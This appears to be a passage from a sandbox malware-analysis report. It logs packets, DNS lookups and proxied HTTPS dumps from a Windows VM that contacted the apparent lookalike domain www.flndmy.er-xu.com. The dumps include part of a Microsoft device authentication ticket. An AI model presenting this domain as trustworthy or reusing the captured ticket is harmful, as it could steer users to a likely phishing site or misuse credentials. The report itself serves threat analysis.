Jan 13, 2025 01:49:40.003662109 CET	53605	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.003698111 CET	443	53605	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.006778002 CET	53604	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.006795883 CET	443	53604	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.013331890 CET	443	53608	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.013411045 CET	443	53608	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.013451099 CET	53608	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.024895906 CET	53608	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.024908066 CET	443	53608	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.039633036 CET	53626	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.039731979 CET	443	53626	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.039854050 CET	53626	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.040144920 CET	53626	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.040179014 CET	443	53626	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.052061081 CET	443	53609	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.052129030 CET	443	53609	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.052165031 CET	53609	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.059550047 CET	53609	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.059571981 CET	443	53609	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.070146084 CET	53627	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.070174932 CET	443	53627	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.070226908 CET	53627	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.070513010 CET	53627	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.070525885 CET	443	53627	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.225613117 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.225645065 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.225655079 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.225691080 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.225693941 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.225728989 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.225739956 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.226342916 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.226386070 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.226397991 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.226419926 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:40.226435900 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.226478100 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.227029085 CET	53607	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:40.227035999 CET	443	53607	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.542608023 CET	443	53626	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.543811083 CET	53626	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:42.543843985 CET	443	53626	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.544199944 CET	443	53626	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.545624971 CET	53626	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:42.545695066 CET	443	53626	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.545922995 CET	53626	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:42.587330103 CET	443	53626	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.835166931 CET	443	53626	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.835385084 CET	443	53626	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.835448027 CET	53626	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:42.838730097 CET	53626	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:42.838762999 CET	443	53626	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.946480036 CET	443	53627	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.947274923 CET	53627	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:42.947290897 CET	443	53627	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.947719097 CET	443	53627	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.948146105 CET	53627	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:42.948224068 CET	443	53627	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:42.948570013 CET	53627	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:42.991327047 CET	443	53627	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:43.255655050 CET	443	53627	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:43.255727053 CET	443	53627	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:43.255800962 CET	53627	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:43.256716013 CET	53627	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:43.256735086 CET	443	53627	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:43.574373007 CET	53654	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:43.574445963 CET	443	53654	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:43.574810028 CET	53654	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:43.575726986 CET	53654	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:43.575741053 CET	443	53654	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:44.710843086 CET	53660	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:44.710930109 CET	443	53660	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:44.711005926 CET	53660	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:44.711687088 CET	53660	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:44.711713076 CET	443	53660	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:45.455620050 CET	443	53654	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:45.456433058 CET	53654	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:45.456475973 CET	443	53654	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:45.457700014 CET	443	53654	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:45.458190918 CET	53654	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:45.458331108 CET	53654	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:45.458348989 CET	443	53654	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:45.458463907 CET	443	53654	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:45.492546082 CET	443	53660	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:45.492620945 CET	53660	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:45.494271994 CET	53660	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:45.494278908 CET	443	53660	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:45.494659901 CET	443	53660	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:45.496279001 CET	53660	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:45.496344090 CET	53660	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:45.496349096 CET	443	53660	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:45.496445894 CET	53660	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:45.503917933 CET	53654	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:45.539338112 CET	443	53660	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:45.776443958 CET	443	53660	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:45.776483059 CET	443	53654	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:45.776659012 CET	443	53660	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:45.776710033 CET	53660	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:45.776851892 CET	53660	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:49:45.776865959 CET	443	53660	40.115.3.253	192.168.2.6
Jan 13, 2025 01:49:45.816421986 CET	53654	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:45.816448927 CET	443	53654	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:45.817167997 CET	53654	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:49:45.817271948 CET	443	53654	89.250.71.221	192.168.2.6
Jan 13, 2025 01:49:45.817342997 CET	53654	443	192.168.2.6	89.250.71.221
Jan 13, 2025 01:50:13.087934017 CET	53713	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:50:13.087966919 CET	443	53713	142.250.186.164	192.168.2.6
Jan 13, 2025 01:50:13.088059902 CET	53713	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:50:13.088366985 CET	53713	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:50:13.088378906 CET	443	53713	142.250.186.164	192.168.2.6
Jan 13, 2025 01:50:13.744659901 CET	443	53713	142.250.186.164	192.168.2.6
Jan 13, 2025 01:50:13.745250940 CET	53713	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:50:13.745271921 CET	443	53713	142.250.186.164	192.168.2.6
Jan 13, 2025 01:50:13.745748043 CET	443	53713	142.250.186.164	192.168.2.6
Jan 13, 2025 01:50:13.746498108 CET	53713	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:50:13.746576071 CET	443	53713	142.250.186.164	192.168.2.6
Jan 13, 2025 01:50:13.793138027 CET	53714	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:50:13.793171883 CET	443	53714	40.115.3.253	192.168.2.6
Jan 13, 2025 01:50:13.793260098 CET	53714	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:50:13.793788910 CET	53714	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:50:13.793803930 CET	443	53714	40.115.3.253	192.168.2.6
Jan 13, 2025 01:50:13.800518036 CET	53713	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:50:14.746840954 CET	443	53714	40.115.3.253	192.168.2.6
Jan 13, 2025 01:50:14.746939898 CET	53714	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:50:14.749351978 CET	53714	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:50:14.749360085 CET	443	53714	40.115.3.253	192.168.2.6
Jan 13, 2025 01:50:14.749772072 CET	443	53714	40.115.3.253	192.168.2.6
Jan 13, 2025 01:50:14.752568960 CET	53714	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:50:14.753004074 CET	53714	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:50:14.753009081 CET	443	53714	40.115.3.253	192.168.2.6
Jan 13, 2025 01:50:14.753353119 CET	53714	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:50:14.799320936 CET	443	53714	40.115.3.253	192.168.2.6
Jan 13, 2025 01:50:14.931685925 CET	443	53714	40.115.3.253	192.168.2.6
Jan 13, 2025 01:50:14.931849003 CET	443	53714	40.115.3.253	192.168.2.6
Jan 13, 2025 01:50:14.932208061 CET	53714	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:50:14.936561108 CET	53714	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:50:14.936578989 CET	443	53714	40.115.3.253	192.168.2.6
Jan 13, 2025 01:50:14.936623096 CET	53714	443	192.168.2.6	40.115.3.253
Jan 13, 2025 01:50:23.663439989 CET	443	53713	142.250.186.164	192.168.2.6
Jan 13, 2025 01:50:23.663583040 CET	443	53713	142.250.186.164	192.168.2.6
Jan 13, 2025 01:50:23.663639069 CET	53713	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:50:25.178669930 CET	53713	443	192.168.2.6	142.250.186.164
Jan 13, 2025 01:50:25.178694963 CET	443	53713	142.250.186.164	192.168.2.6
Jan 13, 2025 01:50:36.769893885 CET	49703	443	192.168.2.6	20.190.159.71
Jan 13, 2025 01:50:36.775278091 CET	443	49703	20.190.159.71	192.168.2.6
Jan 13, 2025 01:50:36.775326967 CET	49703	443	192.168.2.6	20.190.159.71
Jan 13, 2025 01:50:39.050914049 CET	49707	443	192.168.2.6	20.190.159.71
Jan 13, 2025 01:50:39.056097031 CET	443	49707	20.190.159.71	192.168.2.6
Jan 13, 2025 01:50:39.056185961 CET	49707	443	192.168.2.6	20.190.159.71

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 01:49:08.833914042 CET	53	57871	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:08.860449076 CET	53	49789	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:09.876411915 CET	53	54284	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:13.039851904 CET	56523	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:13.040103912 CET	59830	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:13.046722889 CET	53	59830	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:13.046849966 CET	53	56523	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:13.947128057 CET	53	64844	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:14.886655092 CET	51785	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:14.886991024 CET	56810	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:15.902245045 CET	64729	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:15.902504921 CET	58800	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:17.909205914 CET	53	56810	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:17.927215099 CET	61927	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:18.927951097 CET	61927	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:18.949126959 CET	53	58800	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:19.267311096 CET	53	52393	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:19.426856041 CET	53	64729	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:19.930054903 CET	61927	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:21.081880093 CET	53	61927	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:21.081899881 CET	53	61927	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:21.081914902 CET	53	61927	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:22.449870110 CET	53	51785	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:32.159985065 CET	56224	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:32.160419941 CET	52938	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:32.166685104 CET	53	56224	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:32.167309046 CET	53	52938	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:33.536487103 CET	63466	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:33.536488056 CET	60557	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:33.543498039 CET	53	60557	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:33.543513060 CET	53	63466	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:36.719589949 CET	50692	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:36.720228910 CET	62550	53	192.168.2.6	1.1.1.1
Jan 13, 2025 01:49:36.732120991 CET	53	50692	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:37.165572882 CET	53	61382	1.1.1.1	192.168.2.6
Jan 13, 2025 01:49:41.887573004 CET	53	62550	1.1.1.1	192.168.2.6
Jan 13, 2025 01:50:08.663096905 CET	53	58978	1.1.1.1	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jan 13, 2025 01:49:18.949223995 CET	192.168.2.6	1.1.1.1	c243	(Port unreachable)	Destination Unreachable
Jan 13, 2025 01:49:22.449940920 CET	192.168.2.6	1.1.1.1	c1ec	(Port unreachable)	Destination Unreachable
Jan 13, 2025 01:49:41.887658119 CET	192.168.2.6	1.1.1.1	c243	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 13, 2025 01:49:13.039851904 CET	192.168.2.6	1.1.1.1	0x5037	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:13.040103912 CET	192.168.2.6	1.1.1.1	0xd845	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 13, 2025 01:49:14.886655092 CET	192.168.2.6	1.1.1.1	0xffd7	Standard query (0)	www.flndmy.er-xu.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:14.886991024 CET	192.168.2.6	1.1.1.1	0xa545	Standard query (0)	www.flndmy.er-xu.com	65	IN (0x0001)	false
Jan 13, 2025 01:49:15.902245045 CET	192.168.2.6	1.1.1.1	0xe3a6	Standard query (0)	www.flndmy.er-xu.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:15.902504921 CET	192.168.2.6	1.1.1.1	0x715b	Standard query (0)	www.flndmy.er-xu.com	65	IN (0x0001)	false
Jan 13, 2025 01:49:17.927215099 CET	192.168.2.6	1.1.1.1	0x89c	Standard query (0)	www.flndmy.er-xu.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:18.927951097 CET	192.168.2.6	1.1.1.1	0x89c	Standard query (0)	www.flndmy.er-xu.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:19.930054903 CET	192.168.2.6	1.1.1.1	0x89c	Standard query (0)	www.flndmy.er-xu.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:32.159985065 CET	192.168.2.6	1.1.1.1	0xacd8	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:32.160419941 CET	192.168.2.6	1.1.1.1	0xbf1e	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Jan 13, 2025 01:49:33.536487103 CET	192.168.2.6	1.1.1.1	0x8c2d	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:33.536488056 CET	192.168.2.6	1.1.1.1	0xc914	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
Jan 13, 2025 01:49:36.719589949 CET	192.168.2.6	1.1.1.1	0x3991	Standard query (0)	www.flndmy.er-xu.com	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:36.720228910 CET	192.168.2.6	1.1.1.1	0x7c68	Standard query (0)	www.flndmy.er-xu.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 13, 2025 01:49:13.046722889 CET	1.1.1.1	192.168.2.6	0xd845	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 13, 2025 01:49:13.046849966 CET	1.1.1.1	192.168.2.6	0x5037	No error (0)	www.google.com		142.250.186.164	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:17.654990911 CET	1.1.1.1	192.168.2.6	0x1bb2	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 13, 2025 01:49:17.654990911 CET	1.1.1.1	192.168.2.6	0x1bb2	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:19.064038992 CET	1.1.1.1	192.168.2.6	0x37eb	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:19.064038992 CET	1.1.1.1	192.168.2.6	0x37eb	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:19.426856041 CET	1.1.1.1	192.168.2.6	0xe3a6	No error (0)	www.flndmy.er-xu.com		89.250.71.221	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:21.081880093 CET	1.1.1.1	192.168.2.6	0x89c	No error (0)	www.flndmy.er-xu.com		89.250.71.221	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:21.081899881 CET	1.1.1.1	192.168.2.6	0x89c	No error (0)	www.flndmy.er-xu.com		89.250.71.221	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:21.081914902 CET	1.1.1.1	192.168.2.6	0x89c	No error (0)	www.flndmy.er-xu.com		89.250.71.221	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:22.449870110 CET	1.1.1.1	192.168.2.6	0xffd7	Server failure (2)	www.flndmy.er-xu.com	none	none	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:32.166685104 CET	1.1.1.1	192.168.2.6	0xacd8	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:32.166685104 CET	1.1.1.1	192.168.2.6	0xacd8	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:32.166685104 CET	1.1.1.1	192.168.2.6	0xacd8	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:32.166685104 CET	1.1.1.1	192.168.2.6	0xacd8	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:33.543513060 CET	1.1.1.1	192.168.2.6	0x8c2d	No error (0)	code.jquery.com		151.101.66.137	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:33.543513060 CET	1.1.1.1	192.168.2.6	0x8c2d	No error (0)	code.jquery.com		151.101.2.137	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:33.543513060 CET	1.1.1.1	192.168.2.6	0x8c2d	No error (0)	code.jquery.com		151.101.130.137	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:33.543513060 CET	1.1.1.1	192.168.2.6	0x8c2d	No error (0)	code.jquery.com		151.101.194.137	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:49:36.732120991 CET	1.1.1.1	192.168.2.6	0x3991	No error (0)	www.flndmy.er-xu.com		89.250.71.221	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:50:19.179195881 CET	1.1.1.1	192.168.2.6	0xec86	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 13, 2025 01:50:19.179195881 CET	1.1.1.1	192.168.2.6	0xec86	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.flndmy.er-xu.com

https:

code.jquery.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49709	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:03 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 56 50 48 4c 6e 48 4b 42 65 45 36 2f 46 54 63 7a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 33 32 63 36 66 62 62 63 37 32 31 66 34 33 38 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: VPHLnHKBeE6/FTcz.1Context: 132c6fbbc721f438
2025-01-13 00:49:03 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-13 00:49:03 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 56 50 48 4c 6e 48 4b 42 65 45 36 2f 46 54 63 7a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 33 32 63 36 66 62 62 63 37 32 31 66 34 33 38 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 45 2b 7a 48 4d 6e 30 63 46 79 47 75 30 6f 35 62 69 7a 4b 42 31 78 37 65 49 50 45 79 49 55 72 4f 48 6a 2f 53 53 7a 71 78 30 4d 77 34 2b 7a 57 77 46 57 55 43 41 50 32 55 76 67 4d 31 55 4d 51 35 2f 4d 67 67 52 6f 78 77 72 74 57 4b 45 55 79 79 4e 6c 6a 6b 62 4f 4e 37 4f 4f 5a 47 4f 2b 4b 2f 58 2b 6a 34 39 4e 39 74 58 39 78 55 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: VPHLnHKBeE6/FTcz.2Context: 132c6fbbc721f438<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARE+zHMn0cFyGu0o5bizKB1x7eIPEyIUrOHj/SSzqx0Mw4+zWwFWUCAP2UvgM1UMQ5/MggRoxwrtWKEUyyNljkbON7OOZGO+K/X+j49N9tX9xU
2025-01-13 00:49:03 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 56 50 48 4c 6e 48 4b 42 65 45 36 2f 46 54 63 7a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 33 32 63 36 66 62 62 63 37 32 31 66 34 33 38 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: VPHLnHKBeE6/FTcz.3Context: 132c6fbbc721f438<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-13 00:49:03 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2025-01-13 00:49:03 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 77 5a 38 5a 4a 53 41 6e 6e 45 69 31 65 30 56 4c 37 45 42 77 73 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: wZ8ZJSAnnEi1e0VL7EBwsA.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.6	49727	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2025-01-13 00:49:11 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4f 43 6e 52 6b 64 37 79 33 30 57 34 47 52 6a 73 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 66 34 30 39 36 65 39 66 30 36 63 37 61 34 63 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: OCnRkd7y30W4GRjs.1Context: 1f4096e9f06c7a4c
